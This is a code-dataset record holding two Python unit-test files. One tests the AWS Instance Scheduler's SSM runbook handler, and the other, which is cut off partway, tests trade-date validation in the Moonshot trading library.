| 0
| 0
| 0.109042
| 1
| 0.046901
| false
| 0.001524
| 0.004741
| 0
| 0.095157
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
278ac93317faee21c8164f2d7bb518b472e0abaf
| 14,414
|
py
|
Python
|
source/lambda/tests/test_ssm_handler.py
|
elduds/aws-instance-scheduler
|
4b4c8a628fd0ab34e7d5c17af215f0bf10e48bd8
|
[
"Apache-2.0"
] | 338
|
2018-02-09T17:24:26.000Z
|
2021-10-06T01:33:52.000Z
|
source/lambda/tests/test_ssm_handler.py
|
elduds/aws-instance-scheduler
|
4b4c8a628fd0ab34e7d5c17af215f0bf10e48bd8
|
[
"Apache-2.0"
] | 267
|
2018-02-09T10:45:25.000Z
|
2021-10-15T14:47:34.000Z
|
source/lambda/tests/test_ssm_handler.py
|
elduds/aws-instance-scheduler
|
4b4c8a628fd0ab34e7d5c17af215f0bf10e48bd8
|
[
"Apache-2.0"
] | 193
|
2018-02-14T08:25:30.000Z
|
2021-10-06T14:59:14.000Z
|
######################################################################################################################
# Copyright 2021 Amazon.com, Inc. or its affiliates. All Rights Reserved. #
# #
# Licensed under the Apache License Version 2.0 (the "License"). You may not use this file except in compliance #
# with the License. A copy of the License is located at #
# #
# http://www.apache.org/licenses/ #
# #
# or in the "license" file accompanying this file. This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES #
# OR CONDITIONS OF ANY KIND, express or implied. See the License for the specific language governing permissions #
# and limitations under the License. #
######################################################################################################################
from schedulers.ssm_handler import SSMHandler
from util.logger import Logger
import datetime
from unittest.mock import call
#import schedulers
def get_logger():
LOG_STREAM = "{}-{:0>4d}{:0>2d}{:0>2d}"
dt = datetime.datetime.utcnow()
logstream = LOG_STREAM.format('test_configuration_module', dt.year, dt.month, dt.day)
return Logger(logstream=logstream, buffersize=30, context={}, loggroup="test_configuration_module")
def test_run_ssm_runbook_with_multiple_of_max_accounts(mocker):
handler = SSMHandler(
accounts=[0,1,2,3,4,5,6,7,8,9],
automation_assume_role_arn="test_role",
execution_role_name="test_role",
logger=get_logger(),
regions=["us-east-1","us-east-2"],
started_tags=[{'Key':'ScheduleStarted', 'Value': "Date-time-message"}],
stopped_tags=[{'Key':'ScheduleStopped', 'Value': "Date-time-message"}]
)
get_mock = mocker.patch.object(handler, 'execute_ssm_api')
handler.execute_ssm_api.return_value = 'aaas'
response = handler.run_ssm_runbook(
ssm_runbook_name="EC2_START_SSM_DOC",
schedule_tag_name='Schedule',
schedule_tag_value='office-hours-uk',
tags=[{'Key':'ScheduleStarted', 'Value': "Date-time-message"}]
)
assert response == 'aaas'
assert get_mock.call_count == 1
calls = [
call(ssm_runbook_name='EC2_START_SSM_DOC', schedule_tag_name='Schedule', schedule_tag_value='office-hours-uk',
tags=[{'Key':'ScheduleStarted', 'Value': "Date-time-message"}],
target_locations=[
{'Accounts': [0, 1, 2, 3, 4], 'Regions': ['us-east-1', 'us-east-2'], 'ExecutionRoleName': 'test_role', 'TargetLocationMaxConcurrency': '100%', 'TargetLocationMaxErrors': '10%'},
{'Accounts': [5, 6, 7, 8, 9], 'Regions': ['us-east-1', 'us-east-2'], 'ExecutionRoleName': 'test_role', 'TargetLocationMaxConcurrency': '100%', 'TargetLocationMaxErrors': '10%'}
])
]
get_mock.assert_has_calls(calls)
def test_run_ssm_runbook_with_max_accounts(mocker):
handler = SSMHandler(
accounts=[0,1,2,3,4],
automation_assume_role_arn="test_role",
execution_role_name="test_role",
logger=get_logger(),
regions=["us-east-1","us-east-2"],
started_tags=[{'Key':'ScheduleStarted', 'Value': "Date-time-message"}],
stopped_tags=[{'Key':'ScheduleStopped', 'Value': "Date-time-message"}]
)
get_mock = mocker.patch.object(handler, 'execute_ssm_api')
handler.execute_ssm_api.return_value = 'aaas'
response = handler.run_ssm_runbook(
ssm_runbook_name="EC2_START_SSM_DOC",
schedule_tag_name='Schedule',
schedule_tag_value='office-hours-uk',
tags=[{'Key':'ScheduleStarted', 'Value': "Date-time-message"}]
)
assert response == 'aaas'
assert get_mock.call_count == 1
calls = [
call(ssm_runbook_name='EC2_START_SSM_DOC', schedule_tag_name='Schedule', schedule_tag_value='office-hours-uk',
tags=[{'Key':'ScheduleStarted', 'Value': "Date-time-message"}],
target_locations=[{'Accounts': [0, 1, 2, 3, 4], 'Regions': ['us-east-1', 'us-east-2'], 'ExecutionRoleName': 'test_role', 'TargetLocationMaxConcurrency': '100%', 'TargetLocationMaxErrors': '10%'}])
]
get_mock.assert_has_calls(calls)
def test_run_ssm_runbook_with_multiple_and_less_than_remainder_0_of_max_accounts(mocker):
handler = SSMHandler(
accounts=[0,1,2,3,4,5,6],
automation_assume_role_arn="test_role",
execution_role_name="test_role",
logger=get_logger(),
regions=["us-east-1","us-east-2"],
started_tags=[{'Key':'ScheduleStarted', 'Value': "Date-time-message"}],
stopped_tags=[{'Key':'ScheduleStopped', 'Value': "Date-time-message"}]
)
get_mock = mocker.patch.object(handler, 'execute_ssm_api')
handler.execute_ssm_api.return_value = 'aaas'
response = handler.run_ssm_runbook(
ssm_runbook_name="EC2_START_SSM_DOC",
schedule_tag_name='Schedule',
schedule_tag_value='office-hours-uk',
tags=[{'Key':'ScheduleStarted', 'Value': "Date-time-message"}],
)
assert response == 'aaas'
assert get_mock.call_count == 1
calls = [
call(ssm_runbook_name='EC2_START_SSM_DOC', schedule_tag_name='Schedule', schedule_tag_value='office-hours-uk',
tags=[{'Key':'ScheduleStarted', 'Value': "Date-time-message"}],
target_locations=[
{'Accounts': [0, 1, 2, 3, 4], 'Regions': ['us-east-1', 'us-east-2'], 'ExecutionRoleName': 'test_role', 'TargetLocationMaxConcurrency': '100%', 'TargetLocationMaxErrors': '10%'},
{'Accounts': [5, 6], 'Regions': ['us-east-1', 'us-east-2'], 'ExecutionRoleName': 'test_role', 'TargetLocationMaxConcurrency': '100%', 'TargetLocationMaxErrors': '10%'}])
]
get_mock.assert_has_calls(calls)
def test_start_run_rds_instances_document(mocker):
handler = SSMHandler(
accounts=[0,1,2,3,4,5,6],
automation_assume_role_arn="test_role",
execution_role_name="test_role",
logger=get_logger(),
regions=["us-east-1","us-east-2"],
started_tags=[{'Key':'ScheduleStarted', 'Value': "Date-time-message"}],
stopped_tags=[{'Key':'ScheduleStopped', 'Value': "Date-time-message"}]
)
get_mock = mocker.patch.object(handler, 'run_ssm_runbook')
handler.run_ssm_runbook.return_value = 'aaas'
response = handler.run_rds_instances_document('Schedule', 'office-hours-uk', 'running')
assert get_mock.call_count == 1
calls = [
call('RDS_INSTANCES_START_SSM_DOC', 'Schedule', 'office-hours-uk', [{'Key':'ScheduleStarted', 'Value': "Date-time-message"}])
]
get_mock.assert_has_calls(calls)
assert response == 'aaas'
def test_stop_run_rds_instances_document(mocker):
handler = SSMHandler(
accounts=[0,1,2,3,4,5,6],
automation_assume_role_arn="test_role",
execution_role_name="test_role",
logger=get_logger(),
regions=["us-east-1","us-east-2"],
started_tags=[{'Key':'ScheduleStarted', 'Value': "Date-time-message"}],
stopped_tags=[{'Key':'ScheduleStopped', 'Value': "Date-time-message"}]
)
get_mock = mocker.patch.object(handler, 'run_ssm_runbook')
handler.run_ssm_runbook.return_value = 'aaas'
response = handler.run_rds_instances_document('Schedule', 'office-hours-uk', 'stopped')
assert get_mock.call_count == 1
calls = [
call('RDS_INSTANCES_STOP_SSM_DOC', 'Schedule', 'office-hours-uk', [{'Key':'ScheduleStopped', 'Value': "Date-time-message"}])
]
get_mock.assert_has_calls(calls)
assert response == 'aaas'
def test_stop_run_rds_clusters_document(mocker):
handler = SSMHandler(
accounts=[0,1,2,3,4,5,6],
automation_assume_role_arn="test_role",
execution_role_name="test_role",
logger=get_logger(),
regions=["us-east-1","us-east-2"],
started_tags=[{'Key':'ScheduleStarted', 'Value': "Date-time-message"}],
stopped_tags=[{'Key':'ScheduleStopped', 'Value': "Date-time-message"}]
)
get_mock = mocker.patch.object(handler, 'run_ssm_runbook')
handler.run_ssm_runbook.return_value = 'aaas'
response = handler.run_rds_clusters_document('Schedule', 'office-hours-uk', 'stopped')
assert get_mock.call_count == 1
calls = [
call('RDS_CLUSTERS_STOP_SSM_DOC', 'Schedule', 'office-hours-uk', [{'Key':'ScheduleStopped', 'Value': "Date-time-message"}])
]
get_mock.assert_has_calls(calls)
assert response == 'aaas'
def test_start_run_rds_clusters_document(mocker):
handler = SSMHandler(
accounts=[0,1,2,3,4,5,6],
automation_assume_role_arn="test_role",
execution_role_name="test_role",
logger=get_logger(),
regions=["us-east-1","us-east-2"],
started_tags=[{'Key':'ScheduleStarted', 'Value': "Date-time-message"}],
stopped_tags=[{'Key':'ScheduleStopped', 'Value': "Date-time-message"}]
)
get_mock = mocker.patch.object(handler, 'run_ssm_runbook')
handler.run_ssm_runbook.return_value = 'aaas'
response = handler.run_rds_clusters_document('Schedule', 'office-hours-uk', 'running')
assert get_mock.call_count == 1
calls = [
call('RDS_CLUSTERS_START_SSM_DOC', 'Schedule', 'office-hours-uk', [{'Key':'ScheduleStarted', 'Value': "Date-time-message"}])
]
get_mock.assert_has_calls(calls)
assert response == 'aaas'
def test_start_run_ec2_document(mocker):
handler = SSMHandler(
accounts=[0,1,2,3,4,5,6],
automation_assume_role_arn="test_role",
execution_role_name="test_role",
logger=get_logger(),
regions=["us-east-1","us-east-2"],
started_tags=[{'Key':'ScheduleStarted', 'Value': "Date-time-message"}],
stopped_tags=[{'Key':'ScheduleStopped', 'Value': "Date-time-message"}]
)
get_mock = mocker.patch.object(handler, 'run_ssm_runbook')
handler.run_ssm_runbook.return_value = 'aaas'
response = handler.run_ec2_instances_document('Schedule', 'office-hours-uk', 'running')
assert get_mock.call_count == 1
calls = [
call('EC2_START_SSM_DOC', 'Schedule', 'office-hours-uk', [{'Key':'ScheduleStarted', 'Value': "Date-time-message"}])
]
get_mock.assert_has_calls(calls)
assert response == 'aaas'
def test_stop_run_ec2_document(mocker):
handler = SSMHandler(
accounts=[0,1,2,3,4,5,6],
automation_assume_role_arn="test_role",
execution_role_name="test_role",
logger=get_logger(),
regions=["us-east-1","us-east-2"],
started_tags=[{'Key':'ScheduleStarted', 'Value': "Date-time-message"}],
stopped_tags=[{'Key':'ScheduleStopped', 'Value': "Date-time-message"}]
)
get_mock = mocker.patch.object(handler, 'run_ssm_runbook')
handler.run_ssm_runbook.return_value = 'aaas'
response = handler.run_ec2_instances_document('Schedule', 'office-hours-uk', 'stopped')
assert get_mock.call_count == 1
calls = [
call('EC2_STOP_SSM_DOC', 'Schedule', 'office-hours-uk', [{'Key':'ScheduleStopped', 'Value': "Date-time-message"}])
]
get_mock.assert_has_calls(calls)
assert response == 'aaas'
def test_get_tags_in_json_formatted_string_for_rds():
handler = SSMHandler(
accounts=[0,1,2,3,4,5,6],
automation_assume_role_arn="test_role",
execution_role_name="test_role",
logger=get_logger(),
regions=["us-east-1","us-east-2"],
started_tags=[{'Key':'ScheduleStarted', 'Value': "Date-time-message"}],
stopped_tags=[{'Key':'ScheduleStopped', 'Value': "Date-time-message"}]
)
response = handler.get_tags_in_json_formatted_string('RDS_CLUSTERS_START_SSM_DOC', [{'Key':'ScheduleStarted', 'Value': "Date-time-message"}])
assert len(response) == 1
assert response[0] == '{"ScheduleStarted": "Date-time-message"}'
def test_get_tags_in_json_formatted_string_for_rds_empty():
handler = SSMHandler(
accounts=[0,1,2,3,4,5,6],
automation_assume_role_arn="test_role",
execution_role_name="test_role",
logger=get_logger(),
regions=["us-east-1","us-east-2"],
started_tags=[{'Key':'ScheduleStarted', 'Value': "Date-time-message"}],
stopped_tags=[{'Key':'ScheduleStopped', 'Value': "Date-time-message"}]
)
response = handler.get_tags_in_json_formatted_string('RDS_CLUSTERS_START_SSM_DOC', [])
assert len(response) == 1
assert response[0] == '{"StateChanged": "Resource started by Instance Scheduler"}'
def test_get_tags_in_json_formatted_string_for_ec2():
handler = SSMHandler(
accounts=[0,1,2,3,4,5,6],
automation_assume_role_arn="test_role",
execution_role_name="test_role",
logger=get_logger(),
regions=["us-east-1","us-east-2"],
started_tags=[{'Key':'ScheduleStarted', 'Value': "Date-time-message"}],
stopped_tags=[{'Key':'ScheduleStopped', 'Value': "Date-time-message"}]
)
response = handler.get_tags_in_json_formatted_string('EC2_STOP_SSM_DOC', [{'Key':'ScheduleStarted', 'Value': "Date-time-message"}])
assert len(response) == 1
assert response[0] == '{"Key": "ScheduleStarted", "Value": "Date-time-message"}'
def test_get_tags_in_json_formatted_string_for_ec2_empty():
handler = SSMHandler(
accounts=[0,1,2,3,4,5,6],
automation_assume_role_arn="test_role",
execution_role_name="test_role",
logger=get_logger(),
regions=["us-east-1","us-east-2"],
started_tags=[{'Key':'ScheduleStarted', 'Value': "Date-time-message"}],
stopped_tags=[{'Key':'ScheduleStopped', 'Value': "Date-time-message"}]
)
response = handler.get_tags_in_json_formatted_string('EC2_STOP_SSM_DOC', [])
assert len(response) == 1
assert response[0] == '{"Key": "StateChanged", "Value": "Resource started by Instance Scheduler"}'
| 48.369128
| 208
| 0.621965
| 1,709
| 14,414
| 4.971913
| 0.099473
| 0.039543
| 0.074144
| 0.096505
| 0.905261
| 0.895963
| 0.89361
| 0.888902
| 0.888196
| 0.879722
| 0
| 0.019529
| 0.207784
| 14,414
| 297
| 209
| 48.531987
| 0.724582
| 0.081518
| 0
| 0.717054
| 0
| 0
| 0.303644
| 0.037368
| 0
| 0
| 0
| 0
| 0.135659
| 1
| 0.054264
| false
| 0
| 0.015504
| 0
| 0.073643
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7e0e268a28ba03826471b2b62ef2d8407077ac0f
| 61,691
|
py
|
Python
|
tests/test_trade_date_validation.py
|
windblood/moonshot
|
d79cf26e7fb5ce3fcb34060771ea4992e19dc46a
|
[
"Apache-2.0"
] | 122
|
2017-09-14T01:17:56.000Z
|
2022-02-25T11:59:04.000Z
|
tests/test_trade_date_validation.py
|
windblood/moonshot
|
d79cf26e7fb5ce3fcb34060771ea4992e19dc46a
|
[
"Apache-2.0"
] | null | null | null |
tests/test_trade_date_validation.py
|
windblood/moonshot
|
d79cf26e7fb5ce3fcb34060771ea4992e19dc46a
|
[
"Apache-2.0"
] | 39
|
2017-10-24T14:36:54.000Z
|
2022-02-20T01:04:03.000Z
|
# Copyright 2018 QuantRocket LLC - All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# To run: python3 -m unittest discover -s tests/ -p test_*.py -t . -v
import unittest
from unittest.mock import patch
import pandas as pd
import datetime
import pytz
from moonshot import Moonshot
from moonshot.exceptions import MoonshotError
class TradeDateValidationTestCase(unittest.TestCase):
def test_complain_if_stale_date(self):
"""
Tests error handling when data is older than today.
"""
class BuyBelow10(Moonshot):
"""
A basic test strategy that buys below 10.
"""
CODE = "buy-below-10"
def prices_to_signals(self, prices):
signals = prices.loc["Close"] < 10
return signals.astype(int)
def mock_get_prices(*args, **kwargs):
dt_idx = pd.DatetimeIndex(["2018-05-01", "2018-05-02", "2018-05-03"])
fields = ["Close"]
idx = pd.MultiIndex.from_product([fields, dt_idx], names=["Field", "Date"])
prices = pd.DataFrame(
{
"FI12345": [
# Close
9,
11,
10.50
],
"FI23456": [
# Close
9.89,
11,
8.50,
],
},
index=idx
)
return prices
def mock_download_master_file(f, *args, **kwargs):
master_fields = ["Timezone", "SecType", "Currency", "PriceMagnifier", "Multiplier"]
securities = pd.DataFrame(
{
"FI12345": [
"America/New_York",
"STK",
"USD",
None,
None
],
"FI23456": [
"America/New_York",
"STK",
"USD",
None,
None,
]
},
index=master_fields
)
securities.columns.name = "Sid"
securities.T.to_csv(f, index=True, header=True)
f.seek(0)
with patch("moonshot.strategies.base.get_prices", new=mock_get_prices):
with patch("moonshot.strategies.base.download_master_file", new=mock_download_master_file):
with self.assertRaises(MoonshotError) as cm:
BuyBelow10().trade({"U123": 1.0})
self.assertIn((
"expected signal date {0} not found in target weights DataFrame, is "
"the underlying data up-to-date? (max date is 2018-05-03").format(
pd.Timestamp.today(tz="America/New_York").date()), repr(cm.exception))
def test_complain_if_stale_date_continuous_intraday(self):
"""
Tests error handling when data is older than today on a continuous intraday strategy.
"""
class BuyBelow10ShortAbove10ContIntraday(Moonshot):
"""
A basic test strategy that buys below 10 and shorts above 10.
"""
CODE = "c-intraday-pivot-10"
def prices_to_signals(self, prices):
long_signals = prices.loc["Close"] <= 10
short_signals = prices.loc["Close"] > 10
signals = long_signals.astype(int).where(long_signals, -short_signals.astype(int))
return signals
def mock_get_prices(*args, **kwargs):
dt_idx = pd.DatetimeIndex(["2018-05-01","2018-05-02"])
fields = ["Close"]
times = ["10:00:00", "11:00:00", "12:00:00"]
idx = pd.MultiIndex.from_product(
[fields, dt_idx, times], names=["Field", "Date", "Time"])
prices = pd.DataFrame(
{
"FI12345": [
# Close
9.6,
10.45,
10.12,
15.45,
8.67,
12.30,
],
"FI23456": [
# Close
10.56,
12.01,
10.50,
9.80,
13.40,
7.50,
],
},
index=idx
)
return prices
def mock_download_master_file(f, *args, **kwargs):
master_fields = ["Timezone", "SecType", "Currency", "PriceMagnifier", "Multiplier"]
securities = pd.DataFrame(
{
"FI12345": [
"America/New_York",
"STK",
"USD",
None,
None
],
"FI23456": [
"America/New_York",
"STK",
"USD",
None,
None,
]
},
index=master_fields
)
securities.columns.name = "Sid"
securities.T.to_csv(f, index=True, header=True)
f.seek(0)
with patch("moonshot.strategies.base.get_prices", new=mock_get_prices):
with self.assertRaises(MoonshotError) as cm:
with patch("moonshot.strategies.base.download_master_file", new=mock_download_master_file):
BuyBelow10ShortAbove10ContIntraday().trade({"U123": 1.0})
self.assertIn((
"expected signal date {0} not found in target weights DataFrame, is "
"the underlying data up-to-date? (max date is 2018-05-02").format(
pd.Timestamp.today(tz="America/New_York").date()), repr(cm.exception))
def test_complain_if_no_times_on_signal_date_before_trade_time_continuous_intraday(self):
"""
Tests error handling when there are no times on the signal date that
are before the trade time.
Note: it's unclear whether this error condition could be triggered in
the real world unless review_date is passed improperly, which is
covered by a separate test.
"""
class BuyBelow1(Moonshot):
"""
A basic test strategy that buys below 1.
"""
CODE = "buy-below-1"
def prices_to_signals(self, prices):
signals = prices.loc["Close"] < 1
return signals.astype(int)
class BuyBelow10ShortAbove10ContIntraday(Moonshot):
"""
A basic test strategy that buys below 10 and shorts above 10.
"""
CODE = "c-intraday-pivot-10"
def prices_to_signals(self, prices):
long_signals = prices.loc["Close"] <= 10
short_signals = prices.loc["Close"] > 10
signals = long_signals.astype(int).where(long_signals, -short_signals.astype(int))
return signals
def mock_get_prices(*args, **kwargs):
dt_idx = pd.DatetimeIndex(["2018-05-01","2018-05-02"])
fields = ["Close"]
times = ["10:00:00", "11:00:00", "12:00:00"]
idx = pd.MultiIndex.from_product(
[fields, dt_idx, times], names=["Field", "Date", "Time"])
prices = pd.DataFrame(
{
"FI12345": [
# Close
9.6,
10.45,
10.12,
15.45,
8.67,
12.30,
],
"FI23456": [
# Close
10.56,
12.01,
10.50,
9.80,
13.40,
7.50,
],
},
index=idx
)
return prices
def mock_download_master_file(f, *args, **kwargs):
master_fields = ["Timezone", "SecType", "Currency", "PriceMagnifier", "Multiplier"]
securities = pd.DataFrame(
{
"FI12345": [
"America/New_York",
"STK",
"USD",
None,
None
],
"FI23456": [
"America/New_York",
"STK",
"USD",
None,
None,
]
},
index=master_fields
)
securities.columns.name = "Sid"
securities.T.to_csv(f, index=True, header=True)
f.seek(0)
def mock_pd_timestamp_now(tz=None):
if tz == "America/New_York":
return pd.Timestamp("2018-05-02 09:55:53", tz=tz)
elif tz:
return datetime.datetime.now(tzinfo=pytz.timezone(tz))
else:
return datetime.datetime.now()
with patch("moonshot.strategies.base.get_prices", new=mock_get_prices):
with patch("moonshot.strategies.base.pd.Timestamp.now", new=mock_pd_timestamp_now):
with patch("moonshot.strategies.base.download_master_file", new=mock_download_master_file):
with self.assertRaises(MoonshotError) as cm:
BuyBelow10ShortAbove10ContIntraday().trade({"U123": 1.0})
self.assertIn((
"cannot determine which target weights to use for orders because target weights "
"DataFrame contains no times earlier than trade time 09:55:53 "
"for signal date 2018-05-02"), repr(cm.exception))
self.assertNotIn("please adjust the review_date", repr(cm.exception))
def test_complain_if_no_times_on_signal_date_before_trade_time_and_suggest_review_date_continuous_intraday(self):
"""
Tests error handling when there are no times on the signal date that
are before the trade time, and a review date was passed.
"""
class BuyBelow1(Moonshot):
"""
A basic test strategy that buys below 1.
"""
CODE = "buy-below-1"
def prices_to_signals(self, prices):
signals = prices.loc["Close"] < 1
return signals.astype(int)
class BuyBelow10ShortAbove10ContIntraday(Moonshot):
"""
A basic test strategy that buys below 10 and shorts above 10.
"""
CODE = "c-intraday-pivot-10"
def prices_to_signals(self, prices):
long_signals = prices.loc["Close"] <= 10
short_signals = prices.loc["Close"] > 10
signals = long_signals.astype(int).where(long_signals, -short_signals.astype(int))
return signals
def mock_get_prices(*args, **kwargs):
dt_idx = pd.date_range(end=pd.Timestamp.today(tz="America/New_York"), periods=2, normalize=True).tz_localize(None)
fields = ["Close"]
times = ["10:00:00", "11:00:00", "12:00:00"]
idx = pd.MultiIndex.from_product(
[fields, dt_idx, times], names=["Field", "Date", "Time"])
prices = pd.DataFrame(
{
"FI12345": [
# Close
9.6,
10.45,
10.12,
15.45,
8.67,
12.30,
],
"FI23456": [
# Close
10.56,
12.01,
10.50,
9.80,
13.40,
7.50,
],
},
index=idx
)
return prices
def mock_download_master_file(f, *args, **kwargs):
master_fields = ["Timezone", "SecType", "Currency", "PriceMagnifier", "Multiplier"]
securities = pd.DataFrame(
{
"FI12345": [
"America/New_York",
"STK",
"USD",
None,
None
],
"FI23456": [
"America/New_York",
"STK",
"USD",
None,
None,
]
},
index=master_fields
)
securities.columns.name = "Sid"
securities.T.to_csv(f, index=True, header=True)
f.seek(0)
with patch("moonshot.strategies.base.get_prices", new=mock_get_prices):
with patch("moonshot.strategies.base.download_master_file", new=mock_download_master_file):
with self.assertRaises(MoonshotError) as cm:
review_date = pd.Timestamp.today().date().isoformat()
BuyBelow10ShortAbove10ContIntraday().trade({"U123": 1.0},
review_date=review_date)
self.assertIn((
"cannot determine which target weights to use for orders because target weights "
"DataFrame contains no times earlier than trade time 00:00:00 "
"for signal date {0}, please adjust the review_date".format(review_date)),
repr(cm.exception))
def test_complain_if_stale_time_continuous_intraday(self):
"""
Tests error handling on a continuous intraday strategy when data is
available for the signal date but is older than the signal time.
"""
class BuyBelow10ShortAbove10ContIntraday(Moonshot):
"""
A basic test strategy that buys below 10 and shorts above 10.
"""
CODE = "c-intraday-pivot-10"
def prices_to_signals(self, prices):
long_signals = prices.loc["Close"] <= 10
short_signals = prices.loc["Close"] > 10
signals = long_signals.astype(int).where(long_signals, -short_signals.astype(int))
return signals
def mock_get_prices(*args, **kwargs):
dt_idx = pd.DatetimeIndex(["2018-05-01","2018-05-02"])
fields = ["Close","Volume"]
times = ["10:00:00", "11:00:00", "12:00:00"]
idx = pd.MultiIndex.from_product(
[fields, dt_idx, times], names=["Field", "Date", "Time"])
prices = pd.DataFrame(
{
"FI12345": [
# Close
9.6,
10.45,
10.12,
15.45,
8.67,
None,
# Volume,
10000,
20000,
15000,
15400,
15670,
None
],
"FI23456": [
# Close
10.56,
12.01,
10.50,
9.80,
13.40,
None,
# Volume,
30000,
40000,
55000,
65400,
35670,
None
],
},
index=idx
)
return prices
def mock_download_master_file(f, *args, **kwargs):
master_fields = ["Timezone", "SecType", "Currency", "PriceMagnifier", "Multiplier"]
securities = pd.DataFrame(
{
"FI12345": [
"America/New_York",
"STK",
"USD",
None,
None
],
"FI23456": [
"America/New_York",
"STK",
"USD",
None,
None,
]
},
index=master_fields
)
securities.columns.name = "Sid"
securities.T.to_csv(f, index=True, header=True)
f.seek(0)
with patch("moonshot.strategies.base.get_prices", new=mock_get_prices):
with patch("moonshot.strategies.base.download_master_file", new=mock_download_master_file):
with self.assertRaises(MoonshotError) as cm:
BuyBelow10ShortAbove10ContIntraday().trade(
{"U123": 1.0}, review_date="2018-05-02 12:05:13")
self.assertIn((
"no 12:00:00 data found in prices DataFrame for signal date 2018-05-02, "
"is the underlying data up-to-date? (max time for 2018-05-02 "
"is 11:00:00)"), repr(cm.exception))
def test_review_date(self):
"""
Tests the use of review date to generate orders for earlier dates.
"""
class BuyBelow10(Moonshot):
"""
A basic test strategy that buys below 10.
"""
CODE = "buy-below-10"
def prices_to_signals(self, prices):
signals = prices.loc["Close"] < 10
return signals.astype(int)
def mock_get_prices(*args, **kwargs):
dt_idx = pd.DatetimeIndex(["2018-05-01", "2018-05-02", "2018-05-03"])
fields = ["Close"]
idx = pd.MultiIndex.from_product([fields, dt_idx], names=["Field", "Date"])
prices = pd.DataFrame(
{
"FI12345": [
# Close
9,
11,
10.50
],
"FI23456": [
# Close
9.89,
11,
8.50,
],
},
index=idx
)
return prices
def mock_download_master_file(f, *args, **kwargs):
master_fields = ["Timezone", "SecType", "Currency", "PriceMagnifier", "Multiplier"]
securities = pd.DataFrame(
{
"FI12345": [
"America/New_York",
"STK",
"USD",
None,
None
],
"FI23456": [
"America/New_York",
"STK",
"USD",
None,
None,
]
},
index=master_fields
)
securities.columns.name = "Sid"
securities.T.to_csv(f, index=True, header=True)
f.seek(0)
def mock_download_account_balances(f, **kwargs):
balances = pd.DataFrame(dict(Account=["U123"],
NetLiquidation=[55000],
Currency=["USD"]))
balances.to_csv(f, index=False)
f.seek(0)
def mock_download_exchange_rates(f, **kwargs):
rates = pd.DataFrame(dict(BaseCurrency=["USD"],
QuoteCurrency=["USD"],
Rate=[1.0]))
rates.to_csv(f, index=False)
f.seek(0)
def mock_list_positions(**kwargs):
return []
def mock_download_order_statuses(f, **kwargs):
pass
with patch("moonshot.strategies.base.get_prices", new=mock_get_prices):
with patch("moonshot.strategies.base.download_account_balances", new=mock_download_account_balances):
with patch("moonshot.strategies.base.download_exchange_rates", new=mock_download_exchange_rates):
with patch("moonshot.strategies.base.list_positions", new=mock_list_positions):
with patch("moonshot.strategies.base.download_order_statuses", new=mock_download_order_statuses):
with patch("moonshot.strategies.base.download_master_file", new=mock_download_master_file):
orders_20180503 = BuyBelow10().trade({"U123": 1.0}, review_date="2018-05-03")
orders_20180501 = BuyBelow10().trade({"U123": 1.0}, review_date="2018-05-01")
self.assertSetEqual(
set(orders_20180503.columns),
{'Sid',
'Account',
'Action',
'OrderRef',
'TotalQuantity',
'OrderType',
'Tif'}
)
self.assertListEqual(
orders_20180503.to_dict(orient="records"),
[
{
'Sid': "FI23456",
'Account': 'U123',
'Action': 'BUY',
'OrderRef':
'buy-below-10',
# 1.0 allocation * 1.0 weight * 55K / 8.50
'TotalQuantity': 6471,
'OrderType': 'MKT',
'Tif': 'DAY'
}
]
)
self.assertListEqual(
orders_20180501.to_dict(orient="records"),
[
{
'Sid': "FI12345",
'Account': 'U123',
'Action': 'BUY',
'OrderRef': 'buy-below-10',
# 1.0 allocation * 0.5 weight * 55K / 9
'TotalQuantity': 3056,
'OrderType': 'MKT',
'Tif': 'DAY'
},
{
'Sid': "FI23456",
'Account': 'U123',
'Action': 'BUY',
'OrderRef': 'buy-below-10',
# 1.0 allocation * 0.5 weight * 55K / 9.89
'TotalQuantity': 2781,
'OrderType': 'MKT',
'Tif': 'DAY'
}
]
)
def test_review_date_continuous_intraday(self):
"""
Tests the use of review date on a continuous intraday strategy to generate orders for earlier dates.
"""
class BuyBelow10ShortAbove10ContIntraday(Moonshot):
"""
A basic test strategy that buys below 10 and shorts above 10.
"""
CODE = "c-intraday-pivot-10"
def prices_to_signals(self, prices):
long_signals = prices.loc["Close"] <= 10
short_signals = prices.loc["Close"] > 10
signals = long_signals.astype(int).where(long_signals, -short_signals.astype(int))
return signals
def mock_get_prices(*args, **kwargs):
dt_idx = pd.DatetimeIndex(["2018-05-01","2018-05-02"])
fields = ["Close"]
times = ["10:00:00", "11:00:00", "12:00:00"]
idx = pd.MultiIndex.from_product(
[fields, dt_idx, times], names=["Field", "Date", "Time"])
prices = pd.DataFrame(
{
"FI12345": [
# Close
9.6,
10.45,
10.12,
15.45,
8.67,
12.30,
],
"FI23456": [
# Close
10.56,
12.01,
10.50,
9.80,
13.40,
7.50,
],
},
index=idx
)
return prices
def mock_download_master_file(f, *args, **kwargs):
master_fields = ["Timezone", "SecType", "Currency", "PriceMagnifier", "Multiplier"]
securities = pd.DataFrame(
{
"FI12345": [
"America/New_York",
"STK",
"USD",
None,
None
],
"FI23456": [
"America/New_York",
"STK",
"USD",
None,
None,
]
},
index=master_fields
)
securities.columns.name = "Sid"
securities.T.to_csv(f, index=True, header=True)
f.seek(0)
def mock_download_account_balances(f, **kwargs):
balances = pd.DataFrame(dict(Account=["U123"],
NetLiquidation=[60000],
Currency=["USD"]))
balances.to_csv(f, index=False)
f.seek(0)
def mock_download_exchange_rates(f, **kwargs):
